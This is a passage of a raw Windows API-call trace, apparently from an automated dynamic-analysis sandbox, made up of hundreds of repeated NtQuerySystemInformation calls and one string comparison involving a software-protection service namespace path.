ResultLength=0x0) [0226.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0226.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0226.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0226.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0226.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd498, Length=0x50, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0226.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0226.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0226.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x28, ResultLength=0x0) [0226.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x28, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x20, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x20, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x50, ResultLength=0x0) [0226.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0226.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0226.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0226.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0226.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0226.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0226.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0226.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0226.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0226.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x20, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x20, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.859] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd328, Length=0x50, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x28, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0226.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 